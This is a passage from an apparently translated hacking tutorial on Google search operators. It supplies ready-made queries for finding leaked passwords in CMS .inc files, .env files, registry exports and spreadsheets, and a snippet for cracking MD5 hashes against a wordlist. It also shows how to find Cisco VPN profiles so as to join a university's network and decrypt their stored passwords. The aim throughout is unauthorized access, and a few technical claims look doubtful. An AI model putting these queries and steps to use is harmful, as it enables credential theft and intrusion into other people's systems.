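        if key in ("HOST", "UID", "PWD"):
            record[key] = value
        if len(record) == 3:
            print(record)  # the PWD value is still in its obfuscated form here
            record = {}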

    When people talk about hacking an arbitrary site, they usually mean getting a password from the logs and backups of the configuration files of a CMS or an e-commerce application. If you know their typical structure, you can easily specify the keywords. Lines like those found in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop always have a user identifier (UID) and a corresponding password (pwd), and all the information is stored in files with the .inc extension. You can search for them as follows:

    "pwd=" "UID=" ext:inc

    Revealing passwords from DBMS

    In the configuration files of SQL servers, user names and email addresses are stored in plain text, and MD5 hashes are written instead of passwords. Strictly speaking, it is impossible to decrypt them, but you can find a match among the known hash-password pairs.
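
    "Finding a match" simply means hashing dictionary words until one of them collides with the stolen hash. A minimal Python sketch (the hash below is the well-known MD5 of the word password):

    import hashlib

    leaked_hash = "5f4dcc3b5aa765d61d8327deb882cf99"  # md5("password")

    def find_match(target_hash, wordlist):
        for word in wordlist:
            if hashlib.md5(word.encode()).hexdigest() == target_hash:
                return word
        return None

    print(find_match(leaked_hash, ["123456", "qwerty", "password"]))  # password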

    To this day, there are DBMSs that do not even use password hashing, and their configuration files can simply be viewed in the browser.

    intext:DB_PASSWORD filetype:env

    With the advent of Windows servers, the role of configuration files was partially taken over by the registry. You can search through its branches in exactly the same way, using reg as the file type. For example, like this:

    filetype:reg HKEY_CURRENT_USER "Password"=

    Don't forget the obvious

    Sometimes you can reach classified information with the help of data that was accidentally opened up and fell into Google's field of view. The ideal case is to find a list of passwords in some common format. Only desperate people store account information in a text file, a Word document, or an Excel spreadsheet, but there are always enough of them.

    filetype:xls inurl:password

    On the one hand, there are many ways to prevent such incidents. It is necessary to set adequate access rights in htaccess, patch the CMS, avoid dubious third-party scripts, and close other holes. There is also the robots.txt file, which forbids search engines to index the files and directories specified in it. On the other hand, if the robots.txt structure on some server differs from the standard one, it is immediately obvious what they are trying to hide on it.
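
    Checking what a robots.txt is trying to hide takes a few lines of Python (example.com is a placeholder; point it at a site you administer):

    from urllib.request import urlopen

    with urlopen("https://example.com/robots.txt", timeout=10) as response:
        for line in response.read().decode("utf-8", "replace").splitlines():
            if line.lower().startswith("disallow"):
                print(line)  # each entry is a path someone chose to keep out of the index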

    The list of directories and files on any site is preceded by the standard words index of. Since they must appear in the title for service purposes, it makes sense to limit the search with the intitle operator. Interesting things are found in the /admin/, /personal/, /etc/, and even /secret/ directories.

    Follow the updates

    Relevance is extremely important here: old vulnerabilities are closed very slowly, but Google and its search results change constantly. There is even a difference between a "last second" filter (&tbs=qdr:s at the end of the request URL) and a "real time" one (&tbs=qdr:1).

    Google also implicitly provides the time interval of a file's last update. Through the graphical web interface, you can select one of the typical periods (hour, day, week, and so on) or set a date range, but this method is not suitable for automation.

    From the look of the address bar, you can only guess at the way to limit the output of results: the &tbs=qdr: construction. The letter y after it sets a limit of one year (&tbs=qdr:y), m shows the results for the last month, w for the week, d for the last day, h for the last hour, n for the last minute, and s for the last second. The freshest results, just reported to Google, are found using the &tbs=qdr:1 filter.

    If you need to write a tricky script, it is useful to know that a date range is set in Google in Julian format via the daterange operator. For example, this is how you can find a list of PDF documents with the word confidential uploaded between January 1 and July 1, 2015.

    confidential filetype:pdf daterange:2457024-2457205

    The range is specified in Julian date format, without the fractional part. Translating dates manually from the Gregorian calendar is inconvenient; it is easier to use a date converter.
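
    Or write one yourself. A small Python sketch (the offset 1721425 turns Python's proleptic Gregorian ordinal into a Julian day number; the dates reproduce the range used above):

    from datetime import date

    def julian_day(d):
        return d.toordinal() + 1721425

    print(julian_day(date(2015, 1, 1)))  # 2457024
    print(julian_day(date(2015, 7, 1)))  # 2457205
    # together: daterange:2457024-2457205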

    Targeting and filtering again

    In addition to specifying extra operators in the search query, you can send them directly in the body of the link. For example, the qualifier filetype:pdf corresponds to the construction as_filetype=pdf. This makes it convenient to pass any clarifications. Say, returning results only from the Republic of Honduras is specified by adding the construction cr=countryHN to the search URL, and only from the city of Bobruisk by gcs=Bobruisk. A complete list can be found in the developer section.

    Google's automation tools are meant to make life easier, but they often add problems. For example, the user's city is determined from the user's IP via WHOIS. Based on this information, Google not only balances the load between servers but also changes the search results. Depending on the region, the same query will bring different results to the first page, and some of them may turn out to be hidden altogether. The two-letter country code after the gl=country directive will help you feel like a cosmopolitan and search for information from any country. For example, the code of the Netherlands is NL, while the Vatican and North Korea have no code of their own in Google.
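
    A small Python sketch of assembling such a URL by hand (the parameter names are those described above; remember that the ToS quoted earlier forbids sending automated queries, so this only builds a link to open in a browser):

    from urllib.parse import urlencode

    params = {
        "q": 'intitle:"index of" ws_ftp.ini',
        "gl": "nl",           # view the results as if from the Netherlands
        "tbs": "qdr:w",       # indexed within the last week
        "as_filetype": "ini", # same effect as filetype:ini inside the query
    }
    print("https://www.google.com/search?" + urlencode(params))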

    Often, the search results remain cluttered even after several advanced filters have been applied. In this case, it is easy to refine the query by adding several exclusion words (each preceded by a minus sign). For example, banking, names, and tutorial are often used together with the word Personal. Therefore, cleaner search results will be shown not by a textbook example of a query but by a refined one:

    intitle:"Index of /Personal/" -names -tutorial -banking

    Last example

    The sophisticated hacker is distinguished by the fact that he provides himself with everything he needs on his own. For example, a VPN is convenient, but either expensive or temporary and limited. A personal subscription is too costly. It is good that group subscriptions exist, and with Google's help it is easy to become part of a group. To do this, it is enough to find a Cisco VPN configuration file, which has the rather non-standard PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles. One request, and you join, for example, the friendly staff of the University of Bonn.

    filetype:pcf vpn OR Group

    INFO

    Google finds configuration files with passwords, but many of them are encrypted or replaced with hashes. If you see strings of fixed length, immediately look for a decryption service.

    The passwords are stored encrypted, but Maurice Massard has already written a program to decrypt them and provides it free of charge through thecampusgeeks.com.

    Hundreds of different types of attacks and penetration tests are performed with the help of Google. There are many variants, affecting popular programs, major database formats, numerous PHP vulnerabilities, clouds, and so on. Knowing exactly what you are looking for greatly simplifies obtaining the information you need (especially information that was never meant to be public). It is not Shodan alone that feeds interesting ideas, but every database of indexed network resources!





    
